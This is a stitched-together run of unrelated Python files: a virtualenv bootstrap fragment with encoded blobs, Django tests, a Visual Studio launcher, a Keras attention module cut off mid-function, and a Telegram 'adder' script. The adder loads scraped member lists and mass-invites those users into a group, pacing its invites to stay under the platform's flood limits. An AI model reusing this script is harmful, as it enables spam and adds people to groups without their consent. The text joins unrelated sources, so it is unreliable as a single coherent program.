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
178BYnMUkw==
""".decode("base64").decode("zlib")
##file distribute_setup.py
DISTRIBUTE_SETUP_PY = """
<KEY>
<KEY>
""".decode("base64").decode("zlib")
##file activate.sh
ACTIVATE_SH = """
<KEY>
""".decode("base64").decode("zlib")
##file activate.bat
ACTIVATE_BAT = """
<KEY>
""".decode("base64").decode("zlib")
##file deactivate.bat
DEACTIVATE_BAT = """
<KEY>
""".decode("base64").decode("zlib")
##file distutils-init.py
DISTUTILS_INIT = """
<KEY>
""".decode("base64").decode("zlib")
##file distutils.cfg
DISTUTILS_CFG = """
<KEY>
""".decode("base64").decode("zlib")
##file activate_this.py
ACTIVATE_THIS = """
<KEY>
""".decode("base64").decode("zlib")
if __name__ == '__main__':
main()
## TODO:
## Copy python.exe.manifest
## Monkeypatch distutils.sysconfig
|
from django.test import TestCase
from django.utils.timezone import now
from users.models import User, Profile
from streamblocks.models import IndexedParagraph, LandscapeGallery
from cronache.models import Event, Location
#from criterium.models import Race, Athlete
class LocationModelTest(TestCase):
@classmethod
def setUpTestData(cls):
# Set up non-modified objects used by all test methods
Location.objects.create(title='Here', address='Nowhere St.',
gmap_embed = 'http')
Location.objects.create(title='There', address='Somewhere St.',
gmap_embed = '<iframe src="http://foo.bar"></iframe>',
gmap_link = 'http://foo.bar')
def test_location_model_str_method(self):
location = Location.objects.get(slug='here')
self.assertEqual(location.__str__(), 'Here')
def test_location_model_get_gmap_link_none(self):
location = Location.objects.get(slug='here')
self.assertEqual(location.get_gmap_link(), '-')
def test_location_model_get_gmap_link(self):
location = Location.objects.get(slug='there')
self.assertEqual(location.get_gmap_link(),
'<a href="http://foo.bar" class="btn" target="_blank">Mappa</a>')
def test_location_model_stripped_gmap_embed(self):
location = Location.objects.get(slug='there')
self.assertEqual(location.gmap_embed, 'http://foo.bar')
class EventModelTest(TestCase):
@classmethod
def setUpTestData(cls):
user = User.objects.create(username='recipient', password='<PASSWORD>',
email='<EMAIL>')
profile = Profile.objects.get(pk=user.id)
profile.yes_spam = True
profile.save()
location = Location.objects.create(title='Here', address='Nowhere St.',
gmap_embed = 'http', fb_image = 'uploads/location.jpg')
Event.objects.create(title='Past event',
date = '2019-05-10 15:53:00+02', location = location
)
Event.objects.create(title='Future event',
date = '2119-05-10 15:53:00+02', location = location
)
IndexedParagraph.objects.create(id=37, title='Foo', body='Bar')
LandscapeGallery.objects.create(id=38, fb_image='uploads/image.jpg')
Event.objects.create(title='Today event', location = location,
stream = '[{"unique_id":"4h5dps","model_name":"IndexedParagraph","id":37,"options":{}}]',
carousel = '[{"unique_id":"dps4h5","model_name":"LandscapeGallery","id":[38],"options":{}}]',
notice = 'SPAM'
)
def test_event_model_str_method(self):
event = Event.objects.get(slug='today-event')
self.assertEqual(event.__str__(), 'Today event')
def test_event_model_get_badge_color_past(self):
event = Event.objects.get(slug='past-event')
self.assertEqual(event.get_badge_color(), 'secondary')
def test_event_model_get_badge_color_future(self):
event = Event.objects.get(slug='future-event')
self.assertEqual(event.get_badge_color(), 'success')
def test_event_model_get_badge_color_today(self):
event = Event.objects.get(slug='today-event')
self.assertEqual(event.get_badge_color(), 'warning')
def test_event_model_get_image(self):
event = Event.objects.get(slug='today-event')
#here I extract the FilObject.path for convenience
self.assertEquals(event.get_image().path, 'uploads/image.jpg')
def test_event_model_get_image_from_location(self):
event = Event.objects.get(slug='past-event')
#here I extract the FilObject.path for convenience
self.assertEquals(event.get_image().path, 'uploads/location.jpg')
def test_event_model_get_chronicle_true(self):
event = Event.objects.get(slug='past-event')
self.assertTrue(event.get_chronicle())
def test_event_model_get_chronicle_false(self):
event = Event.objects.get(slug='future-event')
self.assertFalse(event.get_chronicle())
def test_event_model_notice_status(self):
event = Event.objects.get(slug='today-event')
self.assertEquals(event.notice, 'DONE')
def test_article_stream_search(self):
event = Event.objects.get(slug='today-event')
self.assertEquals(event.stream_search,
'\n \n Foo\n \n \n \n Bar \n \n\n')
|
#!/bin/env python3
#code by g1ng3rb1t3 (kevo)
try:
from telethon.sync import TelegramClient
from telethon.tl.functions.messages import GetDialogsRequest
from telethon.tl.types import InputPeerEmpty, InputPeerChannel, InputPeerUser
from telethon.errors.rpcerrorlist import FloodWaitError
from telethon.errors.rpcerrorlist import PeerFloodError, UserPrivacyRestrictedError
from telethon.errors.rpcerrorlist import UserNotMutualContactError
from telethon.tl.functions.channels import InviteToChannelRequest
from telethon.errors import SessionPasswordNeededError
import configparser
import os
import sys
import csv
import traceback
import time
from time import sleep
import random
import colorama
import progressbar
from colorama import Fore, Back, Style
UBlue='\033[4;34m'
re="\033[1;31m"
colorama.init(autoreset=True)
green = Style.RESET_ALL+Style.BRIGHT+Fore.GREEN
reset = Style.RESET_ALL
white = Style.DIM+Fore.WHITE
magenta = Style.RESET_ALL+Style.BRIGHT+Fore.MAGENTA
yellow = Style.RESET_ALL+Style.BRIGHT+Fore.YELLOW
red = Style.RESET_ALL+Style.BRIGHT+Fore.RED
blue = Style.RESET_ALL+Style.BRIGHT+Fore.BLUE
def animated_marker():
widgets = [' Starting: ', progressbar.AnimatedMarker()]
bar = progressbar.ProgressBar(widgets=widgets).start()
for i in range(50):
time.sleep(0.10)
bar.update(i)
os.system("clear")
cpass = configparser.RawConfigParser()
cpass.read('config.data')
try:
api_id = cpass['cred']['id']
api_hash = cpass['cred']['hash']
phone = cpass['cred']['phone']
client = TelegramClient(phone, api_id, api_hash)
except KeyError:
os.system('clear')
print("{}[{}!{}] {}ERRor".format(blue,red,blue,red))
sleep(2)
print("{}[{}!{}] {}Run config.py first".format(blue,red,blue,yellow))
sys.exit(1)
animated_marker()
os.system("toilet --gay -f smblock 'Telegram adder'")
print(" "*19+"by (g1ng3rb1t3)kevo")
client.connect()
if not client.is_user_authorized():
try:
client.send_code_request(phone)
client.sign_in(phone, input('{}[+] {}Enter the code: '.format(blue,white)))
except SessionPasswordNeededError:
password = input('{}[+] {}Input Your 2factor password>> '.format(blue,white))
me = client.start(phone,password)
users = []
with open(r"members.csv", encoding='UTF-8') as f: #Enter your file name
rows = csv.reader(f,delimiter=",",lineterminator="\n")
next(rows, None)
for row in rows:
user = {}
user['username'] = row[0]
user['id'] = int(row[1])
user['access_hash'] = int(row[2])
user['name'] = row[3]
users.append(user)
chats = []
last_date = None
chunk_size = 200
groups = []
result = client(GetDialogsRequest(
offset_date=last_date,
offset_id=0,
offset_peer=InputPeerEmpty(),
limit=chunk_size,
hash=0
))
chats.extend(result.chats)
for chat in chats:
try:
if chat.megagroup == True:
groups.append(chat)
except:
continue
print('{}Groups You can add members to'.format(UBlue))
i = 0
for group in groups:
print(blue+'[0'+str(i)+']'+white+ '-> {}{}'.format(red,group.title))
i += 1
g_index = input("\n{}[+] {}Choose a group to add members>> {}".format(blue,white,green))
target_group = groups[int(g_index)]
target_group_entity = InputPeerChannel(target_group.id, target_group.access_hash)
mode = input("{}[=] {}Use [go] or [start]> {}".format(blue,white,green))
n = 0
for user in users:
n += 1
if n % 80 == 0:
sleep(60)
try:
if mode in ('go','start'):
print("{}[+] {}Adding {}{}".format(blue,white,green,user['id']))
if user['username'] == "":
continue
user_to_add = client.get_input_entity(user['username'])
else:
print("{}[{}!{}] {}Invalid option".format(blue,red,blue,red))
sleep(1)
print("{}[{}!{}] {}Use [go] [start] to add members".format(blue,red,blue,red))
sleep(2)
exit()
client(InviteToChannelRequest(target_group_entity, [user_to_add]))
print("{}[=] {}Added successfully".format(blue,green))
time.sleep(random.randrange(0, 5))
except PeerFloodError:
print("{}[{}!{}] {}Flood Error,Take a break.".format(blue,red,blue,red))
sleep (5)
exit("{}[{}X{}] {}Closing".format(blue,red,blue,red))
except UserPrivacyRestrictedError:
print("{}[{}!{}] {}User privacy restriction.skipped".format(blue,red,blue,red))
time.sleep(random.randrange(0, 5))
except FloodWaitError:
print('{}[{}!{}] {}You have to wait 40752 seconds'.format(blue,red,blue,red))
sleep(5)
exit('{}[{}!{}] {}Closing'.format(blue,red,blue,red))
except UserNotMutualContactError:
print("{}[{}!{}] {}User not a mutual contact. Skipped".format(blue,red,blue,red))
time.sleep(random.randrange(0, 5))
except KeyboardInterrupt:
print("\n")
print("{}[+] {}Closing".format(blue,yellow))
sleep(1)
print("{}[+] {}Created by g1ng3rb1t3".format(blue,red))
print("{}[=] {}https://t.me/Iamk3lv1n".format(blue,red))
sleep(1)
sys.exit()
except FileNotFoundError:
print('{}[{}!{}] {}Found no members to add'.format(blue,red,blue,red))
sleep(1)
print('{}[{}!{}] {}Run scrapper.py first to get members'.format(blue,red,blue,green))
sleep(2)
exit()
except ConnectionError:
print("{}[{}!{}] {}Failed to connect to telegram 5 times".format(blue,red,blue,red))
sleep(2)
print("\a{}[{}X{}] {}Check your connection".format(blue,red,blue,red))
sleep(2)
except KeyboardInterrupt:
print("\n")
print("{}[+] {}Closing".format(blue,yellow))
sleep(1)
print("{}[+] {}Created by g1ng3rb1t3".format(blue,red))
print("{}[=] {}https://t.me/Iamk3lv1n\a\a".format(blue,red))
sleep(1)
sys.exit() |
#!/usr/bin/env python3
#
# vsdev.py: https://github.com/kiyolee/vs-tools.git
#
# MIT License
#
# Copyright (c) 2020 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
"""
usage 1: %(__file__)s [options] [devenv-options ...]
Start specific version of Visual Studio.
options:
--msvc6, --vc6
Start MSVC6 if available.
--vs(2003|2005|2008|2010|2012|2013|2015|2017|2019|2022)
--(2003|2005|2008|2010|2012|2013|2015|2017|2019|2022)
Start specific version of Visual Studio if available.
-h, --help
Print this help.
usage 2: %(__file__)s [-l|--list]
List all Visual Studio found.
"""
import sys
assert sys.platform == 'win32'
import os
import subprocess
import re
import nt
import winreg
# __file__ is not defined after compiled with cx_Freeze
if '__file__' not in globals(): __file__ = sys.argv[0]
__program__ = os.path.basename(__file__)
__doc__ = __doc__ % globals()
IS_OS64BIT = (os.environ['PROCESSOR_ARCHITECTURE'] == 'AMD64')
IS_WOW64 = False
if not IS_OS64BIT:
import ctypes
def _is_wow64():
k = ctypes.windll.kernel32
p = k.GetCurrentProcess()
i = ctypes.c_int()
if k.IsWow64Process(p, ctypes.byref(i)):
return i.value != 0
return False
IS_OS64BIT = IS_WOW64 = _is_wow64()
del _is_wow64
del ctypes
#print('# IS_OS64BIT=' + str(IS_OS64BIT) + ' IS_WOW64=' + str(IS_WOW64))
def get_program_files_directories():
pf64 = ''
if IS_OS64BIT:
pf32 = os.environ['ProgramFiles(x86)']
if IS_WOW64:
# 32-bit python on 64-bit windows, cannot rely on ProgramFiles
# which is the same as ProgramFiles(x86) for 32-bit binaries.
x86_suffix = ' (x86)'
if pf32.endswith(x86_suffix):
pf64 = pf32[:-len(x86_suffix)]
else:
pf64 = ''
del x86_suffix
else:
pf64 = os.environ['ProgramFiles']
else:
pf32 = os.environ['ProgramFiles']
return pf32, pf64
VS_KEY = r'Software\Microsoft\VisualStudio'
# MSVC6 (32-bit only)
def get_msdev_exe():
h, h2 = None, None
try:
wowkey = winreg.KEY_WOW64_32KEY if IS_OS64BIT else 0
vs6_key = VS_KEY + r'\6.0'
#print('#', vs6_key, wowkey)
h = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, vs6_key, 0, wowkey | winreg.KEY_READ)
h2 = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, vs6_key + r'\Setup', 0, wowkey | winreg.KEY_READ)
instdir, t = winreg.QueryValueEx(h, 'InstallDir')
assert t == winreg.REG_SZ
commondir, t = winreg.QueryValueEx(h2, 'VsCommonDir')
assert t == winreg.REG_SZ
assert instdir.startswith(commondir) and (commondir[-1] == os.path.sep or instdir[len(commondir)] == os.path.sep)
msdev_exe = os.path.join(commondir, 'msdev98', 'bin', 'msdev.exe')
if os.path.isfile(msdev_exe):
return msdev_exe
except WindowsError as err:
#print(err, file=sys.stderr)
pass
finally:
if h:
winreg.CloseKey(h)
del h
if h2:
winreg.CloseKey(h2)
del h2
return None
# VS2003|2005|2008|2010|2012|2013|2015 (32-bit only)
def get_devenv_exe(vs_ver):
h, h2 = None, None
try:
wowkey = winreg.KEY_WOW64_32KEY if IS_OS64BIT else 0
vsX_key = VS_KEY + '\\' + vs_ver
#print('#', suffix[1:], vsX_key, wowkey)
h = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, vsX_key, 0, wowkey | winreg.KEY_READ)
h2 = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, vsX_key + r'\Setup\VS', 0, wowkey | winreg.KEY_READ)
instdir, t = winreg.QueryValueEx(h, 'InstallDir')
assert t == winreg.REG_SZ
devenv_exe, t = winreg.QueryValueEx(h2, 'EnvironmentPath')
assert t == winreg.REG_SZ
assert devenv_exe.startswith(instdir) and (instdir[-1] == os.path.sep or devenv_exe[len(instdir)] == os.path.sep)
if os.path.isfile(devenv_exe):
return devenv_exe
except WindowsError as err:
#print(err, file=sys.stderr)
pass
finally:
if h:
winreg.CloseKey(h)
del h
if h2:
winreg.CloseKey(h2)
del h2
return None
def vswhere_get_devenv_exe(devenvs, pf32, pf64):
vswhere = os.path.join(pf32, 'Microsoft Visual Studio', 'Installer', 'vswhere.exe')
if not os.path.exists(vswhere):
vswhere = os.path.join(pf64, 'Microsoft Visual Studio', 'Installer', 'vswhere.exe')
if not os.path.exists(vswhere):
return
cmdp = subprocess.Popen([ vswhere, '-nologo' ], stdin=None, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
sout, serr = cmdp.communicate()
if cmdp.returncode != 0 or serr:
return
it = iter(sout.decode('utf-8').split('\r\n'))
try:
while True:
s = next(it).split(': ', 1)
assert len(s) == 2
if s[0] == 'instanceId':
pp, pv = '', ''
try:
while True:
s = next(it)
if not s: break
s = s.split(': ', 1)
assert len(s) == 2
if s[0] == 'productPath':
pp = s[1]
elif s[0] == 'catalog_productLineVersion':
pv = s[1]
except StopIteration:
pass
if pp and pv:
pv = 'vs' + pv
for i in range(1, 99):
vs_id = pv if i == 1 else pv + ('_%d' % i)
if not vs_id in devenvs:
devenvs[vs_id] = pp
break
except StopIteration:
pass
def get_devenv_list():
devenvs = {}
#
# MSVC6 (32-bit only)
#
msdev_exe = get_msdev_exe()
if msdev_exe: devenvs['msvc6'] = msdev_exe
#
# VS2003|2005|2008|2010|2012|2013|2015 (32-bit only)
#
for vs_ver, vs_id in ( ( '7.0', 'vs2003' ),
( '7.1', 'vs2003' ),
( '8.0', 'vs2005' ),
( '9.0', 'vs2008' ),
( '10.0', 'vs2010' ),
( '11.0', 'vs2012' ),
( '12.0', 'vs2013' ),
( '14.0', 'vs2015' ),
):
devenv_exe = get_devenv_exe(vs_ver)
if devenv_exe: devenvs[vs_id] = devenv_exe
#
pf32, pf64 = get_program_files_directories()
#
# VS2017 or later (32-bit only)
#
vswhere_get_devenv_exe(devenvs, pf32, pf64)
#
return devenvs
def get_vs_id_prioritized(devenvs):
vs_ids = list(devenvs.keys())
def _vs_id_to_key(vs_id):
x = 0 if vs_id.startswith('vs') else -1
if x == 0 and '_' in vs_id:
s = vs_id.rsplit('_', 1)
try:
return x, s[0], -int(s[1])
except ValueError:
pass
return x, vs_id, 0
vs_ids.sort(key=_vs_id_to_key, reverse=True)
return vs_ids
def default_devenv(devenvs):
try:
return get_vs_id_prioritized(devenvs)[0]
except IndexError:
pass
return ''
def print_devenvs(devenvs, devdef):
dk = list(devenvs.keys())
if dk:
print('Available Visual Studio %s:' % ('versions' if len(dk) > 1 else 'version'))
def devkey(k):
return k + '(default)' if k == devdef else k
dk.sort()
kl = [ ( k, devkey(k) ) for k in dk ]
ml = len(max(kl, key=lambda k: len(k[1]))[1]) + 1
for k, krem in kl:
print('%-*s%s' % ( ml, krem, devenvs[k] ))
else:
print('No Visual Studio found.')
def clean_env():
REMOVE_LIST = ( 'CommandPromptType',
'DevEnvDir',
'ExtensionSdkDir',
'FSHARPINSTALLDIR',
'Framework35Version',
'Framework40Version',
'FrameworkDIR32',
'FrameworkDIR64',
'FrameworkDir',
'FrameworkVersion32',
'FrameworkVersion64',
'FrameworkVersion',
'HTMLHelpDir',
'IFCPATH',
'INCLUDE',
'LIB',
'LIBPATH',
'NETFXSDKDir',
'Platform',
'UCRTVersion',
'UniversalCRTSdkDir',
'VCIDEInstallDir',
'VCINSTALLDIR',
'VCToolsInstallDir',
'VCToolsRedistDir',
'VCToolsVersion',
'VSCMD_ARG_HOST_ARCH',
'VSCMD_ARG_TGT_ARCH',
'VSCMD_ARG_app_plat',
'VSCMD_VER',
'VSINSTALLDIR',
'VSSDKINSTALL',
'VisualStudioVersion',
'WindowsLibPath',
'WindowsSDKLibVersion',
'WindowsSDKVersion',
'WindowsSDK_ExecutablePath_x64',
'WindowsSDK_ExecutablePath_x86',
'WindowsSdkBinPath',
'WindowsSdkDir',
'WindowsSdkVerBinPath',
'__DOTNET_ADD_32BIT',
'__DOTNET_ADD_64BIT',
'__DOTNET_PREFERRED_BITNESS',
'__VSCMD_PREINIT_PATH',
'__VSCMD_PREINIT_VS150COMNTOOLS',
'__VSCMD_PREINIT_VS160COMNTOOLS',
'__VSCMD_PREINIT_VS170COMNTOOLS',
'__VSCMD_script_err_count',
'is_x64_arch',
)
env = dict(nt.environ)
km = dict([ ( k.upper(), k ) for k in env.keys() ])
for i in ( km[k.upper()] for k in REMOVE_LIST if k.upper() in km ):
del env[i]
def _envkey(k):
return km.get(k.upper(), k)
env[_envkey('PreferredToolArchitecture')] = 'x64'
try:
h = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r'SYSTEM\ControlSet001\Control\Session Manager\Environment', 0, winreg.KEY_READ)
syspath, t = winreg.QueryValueEx(h, 'Path')
assert t == winreg.REG_EXPAND_SZ or t == winreg.REG_SZ
except WindowsError:
syspath = ''
try:
h = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r'Environment', 0, winreg.KEY_READ)
usrpath, t = winreg.QueryValueEx(h, 'Path')
assert t == winreg.REG_EXPAND_SZ or t == winreg.REG_SZ
except WindowsError:
usrpath = ''
if syspath and usrpath:
def _repl(m):
v = m.group('var')
if not v: return '%'
kv = _envkey(v)
if kv in env: return env[kv]
s = m.span('var')
return m.string[s[0]-1:s[1]+1]
pat = re.compile('%(?P<var>\w*)%')
env[_envkey('Path')] = ';'.join([ re.sub(pat, _repl, p ) for p in ( syspath.split(';') + usrpath.split(';') ) if p ])
return env
def main():
devenvs = get_devenv_list()
devdef = default_devenv(devenvs)
vs_opts = list(devenvs.keys())
vs_opts += [ i[2:] for i in vs_opts if i.startswith('vs') ]
if 'msvc6' in devenvs: vs_opts += [ 'vc6' ]
devsel = ''
import getopt
args = []
try:
opts, args = getopt.getopt(sys.argv[1:], 'lh',
[ 'list', 'help', ] + vs_opts)
except getopt.error as err:
print(err, file=sys.stderr)
return 255
for opt, val in opts:
if opt in ( '--msvc6', '--vc6' ):
assert not devsel
devsel = 'msvc6'
elif (opt.startswith('--') and (opt[2:] in devenvs)):
assert not devsel
devsel = opt[2:]
elif (opt.startswith('--') and ('vs' + opt[2:] in devenvs)):
assert not devsel
devsel = 'vs' + opt[2:]
elif opt in ( '-l', '--list' ):
print_devenvs(devenvs, devdef)
return 1
elif opt in ( '-h', '--help' ):
print(__doc__)
return 255
if not devsel: devsel = devdef
devenv = devenvs[devsel]
if sys.version_info.major < 3 or (sys.version_info.major == 3 and sys.version_info.minor <= 4):
# On XP where Pythin latest version is 3.4, execve() crashes.
os.execv(devenv, [ '"' + devenv + '"' ] + [ '"' + a + '"' for a in args ])
else:
os.execve(devenv, [ '"' + devenv + '"' ] + [ '"' + a + '"' for a in args ], clean_env())
return 0
if __name__ == '__main__':
sys.exit(main())
#---eof---
|
from tensorflow.keras.layers import GlobalAveragePooling2D, GlobalMaxPooling2D, Reshape, Dense, multiply, Permute, Concatenate, Conv2D, Add, Activation, Lambda, Conv1D
from tensorflow.keras import backend as K
from tensorflow.keras.activations import sigmoid
from utils import other_transform
import tensorflow as tf
import numpy as np
import math
def attach_attention_module(net, attention_module):
if attention_module == 'se_block': # SE_block
net = se_block(net)
elif attention_module == 'cbam_block': # CBAM_block
net = cbam_block(net)
elif attention_module == 'None': # No attention module
return net
else:
raise Exception("'{}' is not supported attention module!".format(attention_module))
return net
"""
To use original attention block with GlobalAvgPool2D, uncomment line 40 and comment line 42 which has the
other_transform() function for changing the statistic measures and vice-versa.
Measures are:
Standard Deviation- transform='std',
Singular Value Decomposition- transform='svd',
Trace- transform='trace',
Discrete Cosine Transform- transform='dct_dcval'
"""
def se_block(input_feature, ratio=8):
"""Contains the implementation of Squeeze-and-Excitation(SE) block.
As described in https://arxiv.org/abs/1709.01507.
"""
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
channel = input_feature.shape[channel_axis]
# Uncomment the line below for original SE_block and comment other_transform() line 42.
# se_feature = GlobalAveragePooling2D()(input_feature)
se_feature = other_transform(input_feature, channel_axis, transform='trace')
# transform='std','dct_dcval', 'trace', or 'svd'
se_feature = Reshape((1, 1, channel))(se_feature)
assert se_feature.shape[1:] == (1,1,channel)
se_feature = Dense(channel // ratio,
activation='relu',
kernel_initializer='he_normal',
use_bias=True,
bias_initializer='zeros')(se_feature)
assert se_feature.shape[1:] == (1,1,channel//ratio)
se_feature = Dense(channel,
activation='sigmoid',
kernel_initializer='he_normal',
use_bias=True,
bias_initializer='zeros')(se_feature)
assert se_feature.shape[1:] == (1,1,channel)
if K.image_data_format() == 'channels_first':
se_feature = Permute((3, 1, 2))(se_feature)
se_feature = multiply([input_feature, se_feature])
return se_feature
# Other statistic measures not supported for CBAM module.
def cbam_block(cbam_feature, ratio=8):
"""Contains the implementation of Convolutional Block Attention Module(CBAM) block.
As described in https://arxiv.org/abs/1807.06521.
"""
cbam_feature = channel_attention(cbam_feature, ratio)
cbam_feature = spatial_attention(cbam_feature)
return cbam_feature
def channel_attention(input_feature, ratio=8):
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
channel = input_feature.shape[channel_axis]
shared_layer_one = Dense(channel//ratio,
activation='relu',
kernel_initializer='he_normal',
use_bias=True,
bias_initializer='zeros')
shared_layer_two = Dense(channel,
kernel_initializer='he_normal',
use_bias=True,
bias_initializer='zeros')
avg_pool = GlobalAveragePooling2D()(input_feature)
avg_pool = Reshape((1,1,channel))(avg_pool)
assert avg_pool.shape[1:] == (1,1,channel)
avg_pool = shared_layer_one(avg_pool)
assert avg_pool.shape[1:] == (1,1,channel//ratio)
avg_pool = shared_layer_two(avg_pool)
assert avg_pool.shape[1:] == (1,1,channel)
max_pool = GlobalMaxPooling2D()(input_feature)
max_pool = Reshape((1,1,channel))(max_pool)
assert max_pool.shape[1:] == (1,1,channel)
max_pool = shared_layer_one(max_pool)
assert max_pool.shape[1:] == (1,1,channel//ratio)
max_pool = shared_layer_two(max_pool)
assert max_pool.shape[1:] == (1,1,channel)
cbam_feature = Add()([avg_pool,max_pool])
cbam_feature = Activation('sigmoid')(cbam_feature)
if K.image_data_format() == "channels_first":
cbam_feature = Permute((3, 1, 2))(cbam_feature)
return multiply([input_feature, cbam_feature])
def spatial_attention(input_feature):
kernel_size = 7
if K.image_data_format() == "channels_first":
channel = input_feature.shape[1]
cbam_feature = Permute((2,3,1))(input_feature)
else:
channel = input_feature.shape[-1]
cbam_feature = input_feature
avg_pool = Lambda(lambda x: K.mean(x, axis=3, keepdims=True))(cbam_feature)
